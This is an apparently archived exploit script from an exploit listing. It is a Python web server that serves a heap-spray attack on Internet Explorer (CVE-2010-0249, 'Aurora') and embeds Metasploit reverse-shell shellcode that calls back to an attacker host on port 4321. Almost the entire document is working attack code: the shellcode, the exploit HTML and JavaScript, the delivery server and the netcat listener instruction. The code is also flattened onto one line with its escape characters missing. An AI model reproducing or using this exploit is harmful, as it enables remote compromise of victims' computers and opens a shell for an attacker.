11167.py.txt
Posted on 20 January 2010
# # Author : Ahmed Obied (ahmed.obied@gmail.com) # Modify by: syniack (syniack@hotmail.com) # This program acts as a web server that generates an exploit to # target a vulnerability (CVE-2010-0249) in Internet Explorer. # The exploit was tested using Internet Explorer 6 on Windows XP SP3. # The exploit's payload spawns the reverse shell on port 4321. # # Usage : nc -lvp 4321 # Usage : python ie_aurora.py [port number] # import sys import socket from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler class RequestHandler(BaseHTTPRequestHandler): def convert_to_utf16(self, payload): enc_payload = '' for i in range(0, len(payload), 2): num = 0 for j in range(0, 2): num += (ord(payload[i + j]) & 0xff) << (j * 8) enc_payload += '%%u%04x' % num return enc_payload def get_payload(self): # win32_reverse - EXITFUNC=proess LHOST=192.168.30.5 LPORT=4321 Size=312 Encoder=PexFnstenvSub http://metasploit.com payload = 'x29xc9x83xe9xb8xd9xeexd9x74x24xf4x5bx81x73x13x56' payload += 'x9fxdcxdex83xebxfcxe2xf4xaaxf5x37x93xbex66x23x21' payload += 'xa9xffx57xb2x72xbbx57x9bx6ax14xa0xdbx2ex9ex33x55' payload += 'x19x87x57x81x76x9ex37x97xddxabx57xdfxb8xaex1cx47' payload += 'xfax1bx1cxaax51x5ex16xd3x57x5dx37x2ax6dxcbxf8xf6' payload += 'x23x7ax57x81x72x9ex37xb8xddx93x97x55x09x83xddx35' payload += 'x55xb3x57x57x3axbbxc0xbfx95xaex07xbaxddxdcxecx55' payload += 'x16x93x57xaex4ax32x57x9ex5exc1xb4x50x18x91x30x8e' payload += 'xa9x49xbax8dx30xf7xefxecx3exe8xafxecx09xcbx23x0e' payload += 'x3ex54x31x22x6dxcfx23x08x09x16x39xb8xd7x72xd4xdc' payload += 'x03xf5xdex21x86xf7x05xd7xa3x32x8bx21x80xccx8fx8d' payload += 'x05xdcx8fx9dx05x60x0cxb6x96x37xc2xdbx30xf7xccx3f' payload += 'x30xccx55x3fxc3xf7x30x27xfcxffx8bx21x80xf5xccx8f' payload += 'x03x60x0cxb8x3cxfbxbaxb6x35xf2xb6x8ex0fxb6x10x57' payload += 'xb1xf5x98x57xb4xaex1cx2dxfcx0ax55x23xa8xddxf1x20' payload += 'x14xb3x51xa4x6ex34x77x75x3exedx22x6dx40x60xa9xf6' payload += 'xa9x49x87x89x04xcex8dx8fx3cx9ex8dx8fx03xcex23x0e' payload += 'x3ex32x05xdbx98xccx23x08x3cx60x23xe9xa9x4fxb4x39' payload += 'x2fx59xa5x21x23x9bx23x08xa9xe8x20x21x86xf7x2cx54' payload += 'x52xc0x8fx21x80x60x0cxde' return self.convert_to_utf16(payload) def get_exploit(self): exploit = ''' <html> <head> <script> var obj, event_obj; function spray_heap() { var chunk_size, payload, nopsled; chunk_size = 0x80000; payload = unescape("<PAYLOAD>"); nopsled = unescape("<NOP>"); while (nopsled.length < chunk_size) nopsled += nopsled; nopsled_len = chunk_size - (payload.length + 20); nopsled = nopsled.substring(0, nopsled_len); heap_chunks = new Array(); for (var i = 0 ; i < 200 ; i++) heap_chunks[i] = nopsled + payload; } function initialize() { obj = new Array(); event_obj = null; for (var i = 0; i < 200 ; i++ ) obj[i] = document.createElement("COMMENT"); } function ev1(evt) { event_obj = document.createEventObject(evt); document.getElementById("sp1").innerHTML = ""; window.setInterval(ev2, 1); } function ev2() { var data, tmp; data = ""; tmp = unescape("%u0a0a%u0a0a"); for (var i = 0 ; i < 4 ; i++) data += tmp; for (i = 0 ; i < obj.length ; i++ ) { obj[i].data = data; } event_obj.srcElement; } function check() { if (navigator.userAgent.indexOf("MSIE") == -1) return false; return true; } if (check()) { initialize(); spray_heap(); } else window.location = 'about:blank' </script> </head> <body> <span id="sp1"> <img src="aurora.gif" onload="ev1(event)"> </span> </body> </html> ''' exploit = exploit.replace('<PAYLOAD>', self.get_payload()) exploit = exploit.replace('<NOP>', '%u0a0a%u0a0a') return exploit def get_image(self): content = 'x47x49x46x38x39x61x01x00x01x00x80x00x00xffxffxff' content += 'x00x00x00x2cx00x00x00x00x01x00x01x00x00x02x02x44' content += 'x01x00x3b' return content def log_request(self, *args, **kwargs): pass def do_GET(self): try: if self.path == '/': print print '[-] Incoming connection from %s' % self.client_address[0] self.send_response(200) self.send_header('Content-Type', 'text/html') self.end_headers() print '[-] Sending exploit to %s ...' % self.client_address[0] self.wfile.write(self.get_exploit()) print '[-] Exploit sent to %s' % self.client_address[0] elif self.path == '/aurora.gif': self.send_response(200) self.send_header('Content-Type', 'image/gif') self.end_headers() self.wfile.write(self.get_image()) except: print '[*] Error : an error has occured while serving the HTTP request' print '[-] Exiting ...' sys.exit(-1) def main(): if len(sys.argv) != 2: print 'Usage: %s [port number (between 1024 and 65535)]' % sys.argv[0] sys.exit(0) try: port = int(sys.argv[1]) if port < 1024 or port > 65535: raise ValueError try: serv = HTTPServer(('', port), RequestHandler) ip = socket.gethostbyname(socket.gethostname()) print '[-] Web server is running at http://%s:%d/' % (ip, port) try: serv.serve_forever() except: print '[-] Exiting ...' except socket.error: print '[*] Error : a socket error has occurred' sys.exit(-1) except ValueError: print '[*] Error : an invalid port number was given' sys.exit(-1) if __name__ == '__main__': main()
